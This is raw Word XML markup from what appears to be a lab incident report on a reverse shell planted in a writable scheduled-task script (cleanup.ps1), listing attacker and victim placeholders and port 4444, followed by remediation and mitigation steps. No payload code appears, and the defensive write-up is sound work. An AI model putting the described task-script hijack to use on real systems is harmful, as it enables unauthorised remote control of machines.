      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Source:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;VICTIM_IP&gt; (Windows-VM) (Victim)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00680EA3" w:rsidR="00680EA3" w:rsidP="002E72EC" w:rsidRDefault="00680EA3" w14:paraId="6DD20A2D" w14:textId="0B9AB016">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Destination:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;ATTACKER_IP&gt; (Kali) (Attacker)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00680EA3" w:rsidR="00680EA3" w:rsidP="002E72EC" w:rsidRDefault="00680EA3" w14:paraId="2DDD5F8F" w14:textId="2A0E3876">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Port:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444/TCP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00680EA3" w:rsidR="008D7943" w:rsidP="00680EA3" w:rsidRDefault="008D7943" w14:paraId="2327BA0C" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B3923" w:rsidP="00500AD9" w:rsidRDefault="009B3923" w14:paraId="66116B37" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00836EF2" w:rsidP="00C867A9" w:rsidRDefault="00500AD9" w14:paraId="6A58E51D" w14:textId="35A0EE26">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896690" w:id="32"/>
      <w:commentRangeStart w:id="33"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation </w:t>
      </w:r>
      <w:commentRangeEnd w:id="33"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="33"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Strategies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w:rsidRPr="00C867A9" w:rsidR="00C867A9" w:rsidP="00C867A9" w:rsidRDefault="00C867A9" w14:paraId="2B5644FE" w14:textId="77777777"/>
    <w:p w:rsidRPr="00535D2A" w:rsidR="00535D2A" w:rsidP="00535D2A" w:rsidRDefault="00535D2A" w14:paraId="47B628FB" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>1. File Permission Hardening (Stop &amp; Prevent)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00535D2A" w:rsidR="00535D2A" w:rsidP="00535D2A" w:rsidRDefault="00535D2A" w14:paraId="324EF2BC" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>The root cause was that Authenticated Users had "Full Control" over the script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00535D2A" w:rsidR="00535D2A" w:rsidP="0093205D" w:rsidRDefault="00535D2A" w14:paraId="19C2F010" w14:textId="66AAE879">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Use the icacls command to reset the permissions on the C:\TaskScripts\ folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00535D2A" w:rsidR="00535D2A" w:rsidP="0093205D" w:rsidRDefault="00535D2A" w14:paraId="66806084" w14:textId="45A56A4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Ensure only SYSTEM and Administrators have "Write" or "Modify" permissions. Regular users should have "Read &amp; Execute" only.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00836EF2" w:rsidP="00500AD9" w:rsidRDefault="00836EF2" w14:paraId="7ED32FCB" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00D51018" w:rsidR="00D51018" w:rsidP="00D51018" w:rsidRDefault="00D51018" w14:paraId="7E80560E" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>2. Integrity Restoration (Eradicate)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D51018" w:rsidR="00D51018" w:rsidP="00D51018" w:rsidRDefault="00D51018" w14:paraId="1C72612E" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>The cleanup.ps1 file is currently a "trap" containing a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D51018" w:rsidR="00D51018" w:rsidP="0093205D" w:rsidRDefault="00D51018" w14:paraId="6B06F28E" w14:textId="1145EB8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Delete the compromised cleanup.ps1 file immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D51018" w:rsidR="00D51018" w:rsidP="0093205D" w:rsidRDefault="00D51018" w14:paraId="0494316B" w14:textId="4269E3E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Restore the original, legitimate version of the script from a secure backup or a known-good source.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D51018" w:rsidP="00500AD9" w:rsidRDefault="00D51018" w14:paraId="4B69A0E8" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="005E48CF" w:rsidR="005E48CF" w:rsidP="005E48CF" w:rsidRDefault="005E48CF" w14:paraId="5292EF1E" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>3. Session Termination (Containment)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="005E48CF" w:rsidR="005E48CF" w:rsidP="005E48CF" w:rsidRDefault="005E48CF" w14:paraId="69EC2E6F" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>If the attacker is currently connected to the machine, the connection must be severed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="005E48CF" w:rsidR="005E48CF" w:rsidP="0093205D" w:rsidRDefault="005E48CF" w14:paraId="24BE3EAE" w14:textId="7328B501">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Identify and terminate the suspicious powershell.exe process that is communicating with the attacker's IP (&lt;ATTACKER_IP&gt;).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="005E48CF" w:rsidR="005E48CF" w:rsidP="0093205D" w:rsidRDefault="005E48CF" w14:paraId="31775155" w14:textId="7BB4E1A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>If a breach is suspected to be widespread, isolate the victim machine from the network to prevent the attacker from moving to other computers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E48CF" w:rsidP="00500AD9" w:rsidRDefault="005E48CF" w14:paraId="1877D265" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="001833AD" w:rsidR="001833AD" w:rsidP="001833AD" w:rsidRDefault="001833AD" w14:paraId="0F76DBE5" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>4. Task Audit (Review)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="001833AD" w:rsidR="001833AD" w:rsidP="001833AD" w:rsidRDefault="001833AD" w14:paraId="5DDE91F1" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Check if the attacker scheduled any new tasks to stay in the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="001833AD" w:rsidR="001833AD" w:rsidP="0093205D" w:rsidRDefault="001833AD" w14:paraId="3E91BBC5" w14:textId="1A693FA6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Review the Windows Task Scheduler for any unfamiliar tasks created around the time of the incident.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="001833AD" w:rsidR="001833AD" w:rsidP="0093205D" w:rsidRDefault="001833AD" w14:paraId="34B821F2" w14:textId="52BB7C79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Verify that the "CleanupTask" (or the task you used) is still pointing to the correct file path and hasn't been modified to run other malicious commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00500AD9" w:rsidP="00500AD9" w:rsidRDefault="00500AD9" w14:paraId="5C93CA5D" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00D01BC9" w:rsidR="00500AD9" w:rsidP="00500AD9" w:rsidRDefault="00500AD9" w14:paraId="2CC732D2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc220896691" w:id="34"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Control/Mitigation </w:t>
      </w:r>
      <w:commentRangeStart w:id="35"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
      <w:commentRangeEnd w:id="35"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="35"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B739EE" w:rsidP="00500AD9" w:rsidRDefault="00B739EE" w14:paraId="691A782D" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="00967E79" w:rsidR="00967E79" w:rsidP="00967E79" w:rsidRDefault="00967E79" w14:paraId="1C754D43" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>1. Enforcement of "Least Privilege" for Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00967E79" w:rsidR="00967E79" w:rsidP="0093205D" w:rsidRDefault="00967E79" w14:paraId="5B21B730" w14:textId="6AC31832">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Audit all existing Scheduled Tasks to ensure they do not run as SYSTEM unless absolutely necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00967E79" w:rsidR="00967E79" w:rsidP="0093205D" w:rsidRDefault="00967E79" w14:paraId="377DA0F4" w14:textId="59842B33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>For tasks that only perform file cleanups or local maintenance, reconfigure them to run under a dedicated "Service Account" with restricted permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00967E79" w:rsidR="00967E79" w:rsidP="0093205D" w:rsidRDefault="00967E79" w14:paraId="6994756C" w14:textId="3E7A3917">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>If a task runs as a lower-privilege user, even a successful script hijack won't result in full system takeover.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B739EE" w:rsidP="00500AD9" w:rsidRDefault="00B739EE" w14:paraId="74055D61" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="004606DE" w:rsidR="004606DE" w:rsidP="004606DE" w:rsidRDefault="004606DE" w14:paraId="67045A31" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>2. Implementation of PowerShell Constrained Language Mode (CLM)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="004606DE" w:rsidR="004606DE" w:rsidP="0093205D" w:rsidRDefault="004606DE" w14:paraId="2D04FEB1" w14:textId="1A1C9899">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>Use Group Policy (GPO) to enable Constrained Language Mode for standard users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="004606DE" w:rsidR="004606DE" w:rsidP="0093205D" w:rsidRDefault="004606DE" w14:paraId="33AB8D90" w14:textId="5616F29B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>CLM restricts the types of commands PowerShell can run, blocking the complex "Sockets" and "API" calls used in your reverse shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004606DE" w:rsidP="0093205D" w:rsidRDefault="004606DE" w14:paraId="5762AF2B" w14:textId="49661A05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>The attacker’s script would simply fail to run, even if they successfully overwrote the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0051731C" w:rsidP="0051731C" w:rsidRDefault="0051731C" w14:paraId="43CD716B" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0051731C" w:rsidR="0051731C" w:rsidP="0051731C" w:rsidRDefault="0051731C" w14:paraId="1FB27926" w14:textId="77777777">
